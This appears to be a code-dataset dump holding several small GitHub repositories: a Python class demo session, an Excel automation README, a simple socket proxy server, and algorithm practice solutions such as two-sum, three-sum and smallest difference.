Adisatriyo Pratama\n- Surya Asmoro\n\n## Deskripsi Projek\n- Aplikasi yang dapat menentukan apakah seseorang\nboleh mendapatkan vaksin COVID-19 atau belum\nberdasarkan data riwayat penyakit.\n- Aplikasi berbentuk web yang dapat diakses melalui\ninternet.\n- Aplikasi ini menerapkan metode Machine Learning\n\n\n## Team Members and Roles\n- Muhammad Adisatriyo P :\n - Project Management\n - Build ML model\n- Surya Asmoro:\n - Gather Data\n - Cleaning Data\n - Software Testing\n- Stefannov:\n - Gather Data\n - Cleaning Data\n - Software Testing\n\n\n## Background Problem\n\nOur goal for creating this project is to help the process of COVID-19 vaccine distribution faster so that we can reach the minimum 70% of total population to achieve national herd immunity for COVID-19.\n\n## Tools\n- Python3\n- Jupyter Notebook and Google Colab\n- Scikit-Learn\n- Google Docs\n- Github\n- Streamlit Framework\n- Google Cloud Platform\n\n## Machine Learning Model\n\nOur problem is really simple binary Classification with just using decision tree classifier as our main algorithm and several parameters that is provided from scikit-learn can easily reach up to ~99% test accuracy.\n\n### here is the sample code\n\n#### first let's split our dataset into training and testing\n\n```\nfrom sklearn.model_selection import train_test_split\n\n# split data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=42)\n\n```\n#### Initialize model algorithm\n\n```\n# import library\nfrom sklearn.tree import DecisionTreeClassifier\n\n# model initialize with max_depth = 2\ndt = DecisionTreeClassifier(max_depth=2, random_state=42)\n```\n\n#### with that algorithm can have up to ~90% accuracy\n```\nfrom sklearn.metrics import accuracy_score\n\n# fit training set\ndt.fit(X_train, y_train)\n\n# predict test set\ny_pred = dt.predict(X_test)\n\n# accuracy score\naccuracy_score(y_test, y_pred)\n```\n#### output\n```\n0.9180327868852459\n```\n\n#### using 
GridSearchCV for searching best hyperparameter\n```\n# Import library\nfrom sklearn.model_selection import GridSearchCV\n\n## hyperparameter\nparams_dt = {'max_depth':[1,2,3,4,6,8,10], 'min_samples_leaf':[0.0001, 0.001, 0.05, 0.1, 0.2], 'criterion':['gini', 'entropy']}\n\n# performs GridSearchCV\ngrid_dt = GridSearchCV(estimator=dt, param_grid=params_dt, scoring='roc_auc', cv=5, n_jobs=1)\n\n# fit data\ngrid_dt.fit(X_train, y_train)\n\nprint(f'Best Parameters : {grid_dt.best_params_}')\nprint(f'Best Score : {grid_dt.best_score_}')\nprint(f'Best Estimator : {grid_dt.best_estimator_}')\n```\n\n#### The best score is up to ~99% accuracy\n#### output\n```\nBest Parameters : {'criterion': 'gini', 'max_depth': 8, 'min_samples_leaf': 0.0001}\nBest Score : 0.9989732930209121\nBest Estimator : DecisionTreeClassifier(max_depth=8, min_samples_leaf=0.0001, random_state=42)\n```\n\n#### Saving the best model using pickle\n```\nimport pickle\npickle.dump(grid_dt.best_estimator_, open('clf.pkl', 'wb'))\n```\n\n## Deployment\n\nWe are using Google Cloud Platform to quickly deploy our web app. 
We are using Google App Engine and fetch the data from GitHub repository to build the web app.\n\nHere is our web app URL: http://www.screening-apps.info/\n\n\n## Reference\n\n- Python Docs: https://docs.python.org/3/\n- Google Cloud Platform: https://cloud.google.com/\n- Streamlit: https://streamlit.io/\n- Scikit-learn: https://scikit-learn.org/" }, { "alpha_fraction": 0.8913043737411499, "alphanum_fraction": 0.8913043737411499, "avg_line_length": 6.833333492279053, "blob_id": "e0f317ffa1e978fd5b7322bf664c6e6d59182248", "content_id": "42b74dbb6c42f5593942e40e03b11dbf948eb530", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 46, "license_type": "permissive", "max_line_length": 10, "num_lines": 6, "path": "/app/requirements.txt", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "streamlit\npandas\nnumpy\nsklearn\nmatplotlib\nshap" }, { "alpha_fraction": 0.6743602752685547, "alphanum_fraction": 0.6865696310997009, "avg_line_length": 39.95205307006836, "blob_id": "560c6aa7a23f1545b36f9919d96f5679d14ff5f3", "content_id": "ee50bf9db72de05518d4bf907c640737068c9674", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5979, "license_type": "permissive", "max_line_length": 151, "num_lines": 146, "path": "/notebooks/build-timeseries.py", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "# import library\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport joblib\nimport tensorflow as tf\nimport os\n\nCWD = os.getcwd()\n\nHORIZON = 1 # predict next day\nWINDOW_SIZE = 4 # use worth of data\n\n\ndef update_data():\n data = pd.read_csv('https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/vaccinations/country_data/Indonesia.csv')\n data.drop(columns=['source_url'], inplace=True)\n data['date'] = pd.to_datetime(data['date'])\n 
data.set_index('date', inplace=True)\n data.total_vaccinations[-1]\n latest_date = data.index[-1]\n d = dict.fromkeys(data.select_dtypes(np.int64).columns, np.float32)\n data = data.astype(d)\n return data\n\ndef prepare_data():\n data = update_data()\n vacc_one = data.people_vaccinated.to_numpy()\n vacc_full = data.people_fully_vaccinated.to_numpy()\n timesteps = data.index.to_numpy()\n return vacc_one, vacc_full, timesteps\n\ndef create_next_timestep():\n data = update_data()\n last_timestep = data.index[-1]\n next_time_steps = get_future_dates(start_date=last_timestep, horizon=20)\n return next_time_steps\n\n\n\n\n# Create function to view NumPy arrays as windows \ndef make_windows(x, window_size=7, horizon=1):\n \"\"\"\n Turns a 1D array into a 2D array of sequential windows of window_size.\n \"\"\"\n # 1. Create a window of specific window_size (add the horizon on the end for later labelling)\n window_step = np.expand_dims(np.arange(window_size+horizon), axis=0)\n # print(f\"Window step:\\n {window_step}\")\n\n # 2. Create a 2D array of multiple window steps (minus 1 to account for 0 indexing)\n window_indexes = window_step + np.expand_dims(np.arange(len(x)-(window_size+horizon-1)), axis=0).T # create 2D array of windows of size window_size\n # print(f\"Window indexes:\\n {window_indexes[:3], window_indexes[-3:], window_indexes.shape}\")\n\n # 3. Index on the target array (time series) with 2D array of multiple window steps\n windowed_array = x[window_indexes]\n\n # 4. 
Get the labelled windows\n windows, labels = get_labelled_windows(windowed_array, horizon=horizon)\n\n return windows, labels\n\n# Make the train/test splits\ndef make_train_test_splits(windows, labels, test_split=0.2):\n \"\"\"\n Splits matching pairs of windows and labels into train and test splits.\n \"\"\"\n split_size = int(len(windows) * (1-test_split)) # this will default to 80% train/20% test\n train_windows = windows[:split_size]\n train_labels = labels[:split_size]\n test_windows = windows[split_size:]\n test_labels = labels[split_size:]\n return train_windows, test_windows, train_labels, test_labels\n\n# Create function to label windowed data\ndef get_labelled_windows(x, horizon=1):\n \"\"\"\n Creates labels for windowed dataset.\n\n E.g. if horizon=1 (default)\n Input: [1, 2, 3, 4, 5, 6] -> Output: ([1, 2, 3, 4, 5], [6])\n \"\"\"\n return x[:, :-horizon], x[:, -horizon:]\n\n\ndef get_future_dates(start_date, horizon=1, offset=1):\n \"\"\"\n Returns array of datetime values from ranging from start_date to start_date+horizon.\n\n start_date: date to start range (np.datetime64)\n horizon: number of day to add onto start date for range (int)\n offset: if offset=1 (default), original date is not included, if offset=0, original date is included\n \"\"\"\n return np.arange(start_date + np.timedelta64(offset, \"D\"), start_date + np.timedelta64(horizon+1, \"D\"), dtype=\"datetime64[D]\")\n\ndef predict_one():\n new_model = tf.keras.models.load_model(CWD + \"/notebooks/model_experiments/model_conv1D\")\n\n vacc_one, _, timesteps = prepare_data()\n full_windows, full_labels = make_windows(vacc_one, window_size=WINDOW_SIZE, horizon=HORIZON)\n train_windows, test_windows, train_labels, test_labels = make_train_test_splits(full_windows, full_labels)\n # Make predictions on the future\n\n # List for new preds\n future_forecast = []\n last_window = vacc_one[-WINDOW_SIZE:] # get the last window of the training data\n into_future = 20 # how far to predict into the 
future\n\n for i in range(into_future):\n # Make a pred for the last window, then append the prediction, append it again, append it again\n pred = new_model.predict(tf.expand_dims(last_window, axis=0))\n print(f\"Predicting on: \\n {last_window} -> Prediction: {tf.squeeze(pred).numpy()}\\n\")\n future_forecast.append(tf.squeeze(pred).numpy())\n # Update last window with new pred and get WINDOW_SIZE most recent preds (model was trained on WINDOW_SIZE windows)\n last_window = np.append(last_window, pred)[-WINDOW_SIZE:]\n \n return future_forecast\n\ndef predict_full():\n new_model = tf.keras.models.load_model(CWD + \"/notebooks/model_experiments/model_conv1Dfull\")\n _, vacc_full, timesteps = prepare_data()\n full_windows, full_labels = make_windows(vacc_full, window_size=WINDOW_SIZE, horizon=HORIZON)\n train_windows, test_windows, train_labels, test_labels = make_train_test_splits(full_windows, full_labels)\n\n # List for new preds\n future_forecast = []\n last_window = vacc_full[-WINDOW_SIZE:] # get the last window of the training data\n into_future = 20 # how far to predict into the future\n\n for i in range(into_future):\n # Make a pred for the last window, then append the prediction, append it again, append it again\n pred = new_model.predict(tf.expand_dims(last_window, axis=0))\n print(f\"Predicting on: \\n {last_window} -> Prediction: {tf.squeeze(pred).numpy()}\\n\")\n future_forecast.append(tf.squeeze(pred).numpy())\n # Update last window with new pred and get WINDOW_SIZE most recent preds (model was trained on WINDOW_SIZE windows)\n last_window = np.append(last_window, pred)[-WINDOW_SIZE:]\n \n return future_forecast\n\nif __name__ == '__main__':\n one_future = predict_one()\n full_future = predict_full()\n next_time_steps = create_next_timestep()\n\n print(one_future, full_future, next_time_steps)\n" } ]
4
AkashChauhanSoftEngi/Python-Automated-Systems
https://github.com/AkashChauhanSoftEngi/Python-Automated-Systems
5b651b29470f5d7b78e17c5dc47faefff6170466
b86aacebc74f41cf353cde6684cf4cf262646778
376c1be93663cf77fd38faa98146d89b39aa0236
refs/heads/master
2021-01-23T00:14:57.249174
2017-04-17T08:59:12
2017-04-17T08:59:12
85,707,996
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7579461932182312, "alphanum_fraction": 0.7677261829376221, "avg_line_length": 20.72222137451172, "blob_id": "59f8d4d41f0e59239f9505111616a2d6dda0b8a7", "content_id": "96b26946635ee9880e6924adbf3a50af2f461061", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 55, "num_lines": 18, "path": "/Script/PY.py", "repo_name": "AkashChauhanSoftEngi/Python-Automated-Systems", "src_encoding": "UTF-8", "text": "#from win32 import win32api\r\nfrom tkinter import *\r\n#import tkinter.filedialog\r\nfrom tkinter import filedialog\r\nimport os\r\nimport xlrd, xlwt\r\nimport pandas as pd\r\nimport xlutils.filter\r\nfrom xlutils.copy import copy as xl_copy\r\nimport tkinter as tk\r\nimport openpyxl\r\nimport re\r\nimport string\r\n\r\nroot = tk.Tk()\r\nroot.withdraw()\r\nfile_path = filedialog.askopenfilename(title='xxxxxxx')\r\n#Rest content deleted!\r\n" }, { "alpha_fraction": 0.7607879638671875, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 40, "blob_id": "4c46017c2e12f50d51e4f49cd0ec97935223ed16", "content_id": "955d3184e4a81cbcb5ac23094c3acaa9388e639d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1066, "license_type": "no_license", "max_line_length": 299, "num_lines": 26, "path": "/README.md", "repo_name": "AkashChauhanSoftEngi/Python-Automated-Systems", "src_encoding": "UTF-8", "text": "# Python-Automated-Systems\nIt is a Complex-Data-Manipulations & Management system\n\nThis is an Automated python project which helps Companies for Data Manipulations & Management. Complex manipulations on Excel's data has become so easy with this automated system.\n\nThis system automatically read the find that needs to be manipulated and store it to a desired place. 
This process contain complax logics to execute on excel file so it usually takes 6 minutes on 1,048,576 records excel file. This software runs in background so other work can be done along with it.\n\nThis Automated software helped employees to perform more tasks in given time. Company has saved 4 hours each day of around 20 employees by using one of these software's.\n\nThis project uses:\n* Python 3.5.2 & 2.7.12\n* Eclipse & Sublime [IDE & Text editor]\n\nLibraris like:\n* py2exe\n* openpyxl\n* pandas\n* pywin32\n* NumPy\n* pillow\n* regex\n* MySQL\n* python\n* pip\n\n<tt>I have shared only few details here but not the actual code, the code includes private information of the company I have created for!<tt>.\n" } ]
2
jvaleo/pure-python-proxy
https://github.com/jvaleo/pure-python-proxy
f066383bc5523c0ab28b4bf6c5aa4f8e8fb752c8
535c44e0bacbb838d638a69deb0767267aaf17f0
182f4f51664aff63d49831c6e330d791558cd91b
refs/heads/master
2021-01-22T09:32:06.673095
2014-08-07T00:21:08
2014-08-07T00:21:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5524030327796936, "alphanum_fraction": 0.5775911808013916, "avg_line_length": 30.117116928100586, "blob_id": "7ce86f79dc7c9f7aaa132b7d09128c63b5f01d2b", "content_id": "9424bce82f08f3406efce6e22f951d9f46369258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3454, "license_type": "no_license", "max_line_length": 98, "num_lines": 111, "path": "/proxy-server.py", "repo_name": "jvaleo/pure-python-proxy", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nSimple proxy server\n\"\"\"\n\nimport logging\nimport re\nimport socket\nimport sys\nimport threading\n\nHOST = '0.0.0.0'\nPORT = 8181\n\nLOG = logging.getLogger(__name__)\nLOG_HANDLER = logging.StreamHandler(sys.stdout)\nFORMAT = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\nLOG_HANDLER.setFormatter(FORMAT)\nLOG.addHandler(LOG_HANDLER)\nLOG.setLevel(logging.DEBUG)\n\ndef multithreading_server(client, addr):\n \"\"\"\n Threading handle\n \"\"\"\n data = client.recv(1024)\n lock = threading.Lock()\n while 1:\n lock.acquire()\n lock.release()\n LOG.debug('Client closed: {0}'.format(addr))\n lock.close()\n\n\ndef get_headers(data):\n \"\"\"\n Get the headers, if it is a GET then pass to check proxy server and pass the request\n \"\"\"\n headers = {}\n accepted_methods = [ 'POST', 'GET']\n lines = data.splitlines()\n for i in lines:\n if 'GET' in i or 'POST' in i: # Only support GET or POST\n request_path = i.split()[1]\n if re.match(r\"\\/service_1\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.10:8000'\n elif re.match(r\"\\/service_2\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.20:8001'\n elif re.match(r\"\\/service_3\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.30:8002'\n elif re.match(r\"\\/service_4\\/.*\", request_path):\n request = request_path.split('/')[2]\n proxy_path = '10.0.0.30:8003'\n 
return request, proxy_path\n break\n request, proxy_path = None\n return request, proxy_path\n\ndef web_server():\n \"\"\"\n Listen for requests on PORT\n \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n try:\n sock.bind((HOST, PORT))\n except Exception as e:\n LOG.error('Unable to bind to {0}:{1}'.format(HOST,PORT))\n sys.exit()\n sock.listen(5)\n while True:\n conn, addr = sock.accept()\n LOG.debug('Client {0}'.format(addr))\n data = conn.recv(1024)\n try:\n request, proxy_path = get_headers(data)\n except Exception as e:\n LOG.error('Unable to parse request/proxy_path')\n threading.Thread(target = multithreading_server, args = (conn, addr)).start()\n proxy_connection(proxy_path, request)\n\ndef proxy_connection(host, data):\n \"\"\"\n Take in a host:port and data and send it to the destination\n \"\"\"\n dest_ip = host.split(':')[0]\n dest_port = int(host.split(':')[1])\n forward = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n forward.settimeout(1)\n try:\n forward.connect((dest_ip, dest_port))\n LOG.debug('{0} {1}'.format(dest_ip, dest_port))\n except Exception as e:\n LOG.error('Unable to connect to {0} on {1} - {2}'.format(dest_ip, dest_port, e))\n try:\n forward.send(data)\n LOG.debug('{0} {1} {2}'.format(dest_ip, dest_port, data))\n forward.close()\n except Exception as e:\n LOG.error('Unable to send data {0} on {1} - {2} {3}'.format(dest_ip, dest_port, data, e))\n\nif __name__ == '__main__':\n try:\n while True:\n web_server()\n except KeyboardInterrupt:\n LOG.info('Caught KeyboardInterrupt')\n sys.exit()\n" } ]
1
RaulCoronado/Ejemplo-de-clases
https://github.com/RaulCoronado/Ejemplo-de-clases
a14b376716770aef8d9d6398d9aabcdd0c5fce09
3c957436afac7cb0ad630a0400be2d3f5f17a381
d999ed5924300beaa5259174aa3b92bb19b2cd78
refs/heads/master
2020-04-18T02:45:53.192534
2016-08-31T23:29:58
2016-08-31T23:29:58
67,080,924
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5669050216674805, "alphanum_fraction": 0.6353421807289124, "avg_line_length": 23.076923370361328, "blob_id": "50d1d50c9fd8037585c0c8800391c7fc3271e481", "content_id": "8341223e5879bbd46059d606b13472d610d3f513", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 979, "license_type": "no_license", "max_line_length": 94, "num_lines": 39, "path": "/Clases.py", "repo_name": "RaulCoronado/Ejemplo-de-clases", "src_encoding": "UTF-8", "text": "Python 3.5.2 (v3.5.2:4def2a2901a5, Jun 25 2016, 22:18:55) [MSC v.1900 64 bit (AMD64)] on win32\r\nType \"copyright\", \"credits\" or \"license()\" for more information.\r\n\r\n>>> class Pan:\r\n\tdef __init__(self, tam,sabor,precio):\r\n\t\tself.tam=tam\r\n\t\tself.sabor=sabor\r\n\t\tself.precio=precio\r\n\tdef desplegarC(self):\r\n\t\tprint (self.tam),\r\n\t\tprint (self.sabor),\r\n\t\tprint (self.precio)\r\n\t\t\r\n>>> pan1 = Pan(Grande,queso,50)\r\nTraceback (most recent call last):\r\n File \"<pyshell#17>\", line 1, in <module>\r\n pan1 = Pan(Grande,queso,50)\r\nNameError: name 'Grande' is not defined\r\n>>> pan1 = Pan(\"Grande\",\"Queso\",\"25\")\r\n>>> pan2 = Pan(\"Pequeno\",\"Chocolate\",\"10\")\r\n>>> pan3 = Pan(\"Grande\",\"Dulce\",\"500\")\r\n>>> pan1.desplegarC()\r\nGrande\r\nQueso\r\n25\r\n>>> pan2.desplegarC()\r\nPequeno\r\nChocolate\r\n10\r\n>>> pan3.desplegarC()\r\nGrande\r\nDulce\r\n500\r\n>>> raw_imput()\r\nTraceback (most recent call last):\r\n File \"<pyshell#24>\", line 1, in <module>\r\n raw_imput()\r\nNameError: name 'raw_imput' is not defined\r\n>>> \r\n" }, { "alpha_fraction": 0.7894737124443054, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 19, "blob_id": "b31221959d60e3b980bb14e5c1f8d01809d2bc30", "content_id": "03b61bf3a4910d613bb7d52d26940678ff53c1cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 19, "license_type": "no_license", "max_line_length": 19, 
"num_lines": 1, "path": "/README.md", "repo_name": "RaulCoronado/Ejemplo-de-clases", "src_encoding": "UTF-8", "text": "# Ejemplo-de-clases" } ]
2
henryoliver/algo-expert-solutions
https://github.com/henryoliver/algo-expert-solutions
35ac4df09b83d5fef31c1695fc8404a274312ca9
c45623861d97862fa62e2461a56d3946adde7e22
2e26cd20d96764bfe4e3dd29ece1a96cc2461bb8
refs/heads/master
2022-08-28T15:18:55.903334
2020-05-26T12:27:34
2020-05-26T12:27:34
266,343,724
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5013267993927002, "alphanum_fraction": 0.547866940498352, "avg_line_length": 35.014705657958984, "blob_id": "7816eb7e2aaf802a4b42998a24689e33f8304416", "content_id": "d3c7f5f63b14f41e3aa18fd7fbd0ec25b9237844", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4911, "license_type": "permissive", "max_line_length": 187, "num_lines": 136, "path": "/Arrays/three-number-sum.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# def threeNumberSum(array=[], targetSum=0):\n# '''\n# Solution 1 - Naive approach\n#\n# O(n^3) time | O(1) space\n#\n# The function should find all triplets in the array that sum up\n# to the target sum and return a two-dimensional array of all these triplets.\n#\n# array: a list of integers\n# targetSum: an integer\n# return: a two-dimensional list of all found triplets\n# '''\n# # Remove duplicates and sort the list\n# array = sorted(list(dict.fromkeys(array)))\n#\n# foundTriplets = [];\n#\n# for i in range(len(array) - 2):\n# firstNumber = array[i]\n#\n# for j in range(i + 1, len(array) - 1):\n# secondNumber = array[j]\n#\n# for k in range(j + 1, len(array)):\n# thirdNumber = array[k]\n#\n# if (firstNumber + secondNumber + thirdNumber == targetSum):\n# foundTriplets.append([firstNumber, secondNumber, thirdNumber])\n#\n# return foundTriplets\n#\n\n# def threeNumberSum(array=[], targetSum=0):\n# '''\n# Solution 2 - Hash map\n#\n# O(n^2) time | O(n) space\n#\n# If any two numbers in the input array sum up to the target sum,\n# the funciton should return them in an array.\n#\n# array: a list of integers\n# targetSum: an integer\n# return: a list of two integers\n# '''\n# # Remove duplicates and sort the list\n# array = sorted(list(dict.fromkeys(array)))\n#\n# foundTriplets = []\n#\n# for i in range(len(array) - 1):\n# trackedNumbers = {}\n# firstNumber = array[i]\n#\n# for j in range(i + 1, len(array)):\n# secondNumber = 
array[j]\n# potentialDiff = targetSum - (firstNumber + secondNumber)\n#\n# if (potentialDiff in trackedNumbers):\n# foundTriplets.append(sorted([potentialDiff, firstNumber, secondNumber]))\n# else:\n# trackedNumbers[secondNumber] = True\n#\n# foundTriplets.sort()\n#\n# return foundTriplets\n#\n\ndef threeNumberSum(array=[], targetSum=0):\n '''\n Solution 3\n\n O(n^2) time | O(n) space\n\n The function should find all triplets in the array that sum up\n to the target sum and return a two-dimensional array of all these triplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found triplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n foundTriplets = []\n\n for i in range(len(array) - 2):\n leftPointer = i + 1\n rightPointer = len(array) - 1\n\n while (leftPointer < rightPointer):\n currentSum = array[i] + array[leftPointer] + array[rightPointer]\n\n if (currentSum == targetSum):\n foundTriplets.append(sorted([array[i], array[leftPointer], array[rightPointer]]))\n leftPointer += 1\n rightPointer -= 1\n elif (currentSum < targetSum):\n leftPointer += 1\n elif (currentSum > targetSum):\n rightPointer -= 1\n\n foundTriplets.sort()\n\n return foundTriplets\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n { 'assert': threeNumberSum([1, 2, 3], 7), 'expected': [] },\n { 'assert': threeNumberSum([1, 2, 3], 6), 'expected': [[1, 2, 3]] },\n { 'assert': threeNumberSum([8, 10, -2, 49, 14], 57), 'expected': [[-2, 10, 49]] },\n { 'assert': threeNumberSum([12, 3, 1, 2, -6, 5, -8, 6], 0), 'expected': [[-8, 2, 6], [-8, 3, 5], [-6, 1, 5]] },\n { 'assert': threeNumberSum([12, 3, 1, 2, -6, 5, 0, -8, -1], 0), 'expected': [[-8, 3, 5], [-6, 1, 5], [-1, 0, 1]] },\n { 'assert': threeNumberSum([1, 2, 3, 4, 5, 6, 7, 8, 9, 15], 18), 'expected': [[1, 2, 15], [1, 8, 9], [2, 7, 9], [3, 6, 9], [3, 7, 8], [4, 5, 9], [4, 6, 8], [5, 6, 7]] },\n\n # Boundary conditions (empty lists, singleton 
list, large numbers, small numbers)\n { 'assert': threeNumberSum(), 'expected': [] },\n { 'assert': threeNumberSum([], 0), 'expected': [] },\n { 'assert': threeNumberSum([1], 10), 'expected': [] },\n { 'assert': threeNumberSum([1, 2, 3, 4]), 'expected': [] },\n { 'assert': threeNumberSum([], 1000000000), 'expected': [] },\n { 'assert': threeNumberSum([1, 1, 1, 1, 2, 2, 2], 0), 'expected': [] },\n\n # Extremes\n { 'assert': threeNumberSum([12, 3, 1, 2, -6, 5, 0, -8, -1, 6, -5], 0), 'expected': [[-8, 2, 6], [-8, 3, 5], [-6, 0, 6], [-6, 1, 5], [-5, -1, 6], [-5, 0, 5], [-5, 2, 3], [-1, 0, 1]] },\n { 'assert': threeNumberSum([1, 2, 3, 4, 5, 6, 7, 8, 9, 15], 18), 'expected': [[1, 2, 15], [1, 8, 9], [2, 7, 9], [3, 6, 9], [3, 7, 8], [4, 5, 9], [4, 6, 8], [5, 6, 7]]}\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5907368659973145, "alphanum_fraction": 0.6138947606086731, "avg_line_length": 23.73958396911621, "blob_id": "1f4bfe290132587a1a7c942dd70ed5f4a4215ab6", "content_id": "b8a07541ea5d6e213e68edc66859cbb98204c6a5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2387, "license_type": "permissive", "max_line_length": 115, "num_lines": 96, "path": "/Binary Search Trees/bst-construction.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "def twoNumberSum(array=[], targetSum=0):\n '''\n Solution 1\n\n O(n^2) time | O(1) space\n\n If any two numbers in the input array sum up to the target sum,\n the funciton should return them in an array.\n\n array: a list of integers\n targetSum: an integer\n return: a list of two integers\n '''\n\n arrayLength = len(array)\n\n for i in range(arrayLength - 1):\n firstNumber = 
array[i]\n\n for j in range(i + 1, arrayLength):\n secondNumber = array[j]\n\n if (firstNumber + secondNumber == targetSum):\n return [firstNumber, secondNumber]\n\n return []\n\n\ndef twoNumberSum(array=[], targetSum=0):\n '''\n Solution 2\n\n O(n) time | O(n) space\n\n If any two numbers in the input array sum up to the target sum,\n the funciton should return them in an array.\n\n array: a list of integers\n targetSum: an integer\n return: a list of two integers\n '''\n trackedNumbers = {}\n\n for currentNumber in array:\n potentialPair = targetSum - currentNumber\n\n if (potentialPair in trackedNumbers):\n return [potentialPair, currentNumber]\n else:\n trackedNumbers[currentNumber] = True\n\n return []\n\n\ndef twoNumberSum(array=[], targetSum=0):\n '''\n Solution 3\n\n O(n log(n)) time | O(1) space\n\n If any two numbers in the input array sum up to the target sum,\n the funciton should return them in an array.\n\n array: a list of integers\n targetSum: an integer\n return: a list of two integers\n '''\n array.sort()\n\n leftIndex = 0\n rigthIndex = len(array) - 1\n\n while (leftIndex < rigthIndex):\n currentSum = array[leftIndex] + array[rigthIndex]\n\n if (currentSum == targetSum):\n return [array[leftIndex], array[rigthIndex]]\n elif (currentSum < targetSum):\n leftIndex += 1\n elif (currentSum > targetSum):\n rigthIndex -= 1\n\n return []\n\n\n# Test cases (black box - unit testing)\n'Test Case #2'\nsorted(twoNumberSum([3, 5, -4, 8, 11, 1, -1, 6], 10)) == [-1, 11] and '🤘 Test PASSED' or '👎 Test FAILED'\n\n# Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n'Boundary conditions'\n'Test Case #2'\nsorted(twoNumberSum([-21, 301, 12, 4, 65, 56, 210, 356, 9, -47], 164)) == [] and '🤘 Test PASSED' or '👎 Test FAILED'\n\n# Extremes\n# console.info('Extremes');\n" }, { "alpha_fraction": 0.5598363280296326, "alphanum_fraction": 0.5963177680969238, "avg_line_length": 32.318180084228516, "blob_id": 
"a94b4667df66301ae74d38059d3191ab966c29ae", "content_id": "0345114b0c00db71470723b2efb19e2a05a3b247", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2945, "license_type": "permissive", "max_line_length": 110, "num_lines": 88, "path": "/Arrays/smallest-difference.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# Smallest Difference\n\n# def smallestDifference(arrayOne=[], arrayTwo=[]):\n# '''\n# Solution 1 - Brute force (aka: Naive approach)\n#\n# O(n^2) time | O(1) space\n#\n# arrayOne: a list of integers\n# arrayTwo: a list of integers\n# return: a list of two integers\n# '''\n# closestPair = []\n# closestNumber = float('inf')\n#\n# for firstNumber in arrayOne:\n# for secondNumber in arrayTwo:\n# absoluteDiff = abs(firstNumber - secondNumber)\n#\n# if (absoluteDiff < closestNumber):\n# closestNumber = absoluteDiff\n# closestPair = [firstNumber, secondNumber]\n#\n# return closestPair\n\ndef smallestDifference(arrayOne=[], arrayTwo=[]):\n '''\n Solution 2 - Sorting along with the two-pointer sliding window approach\n\n O(n log(n) + m log(m)) time | O(1) space\n\n arrayOne: a list of integers\n arrayTwo: a list of integers\n return: a list of two integers\n '''\n arrayOne.sort()\n arrayTwo.sort()\n\n closestPair = []\n closestNumber = float('inf')\n\n arrayOnePointer = 0;\n arrayTwoPointer = 0;\n\n while (arrayOnePointer < len(arrayOne) and arrayTwoPointer < len(arrayTwo)):\n firstNumber = arrayOne[arrayOnePointer]\n secondNumber = arrayTwo[arrayTwoPointer]\n currentAbsDiff = abs(firstNumber - secondNumber)\n\n if (firstNumber == secondNumber):\n closestPair = [firstNumber, secondNumber]\n break\n\n if (currentAbsDiff < closestNumber):\n closestNumber = currentAbsDiff\n closestPair = [firstNumber, secondNumber]\n\n if (firstNumber < secondNumber):\n arrayOnePointer += 1\n elif (secondNumber < firstNumber):\n arrayTwoPointer += 1\n\n return closestPair\n\n\n# 
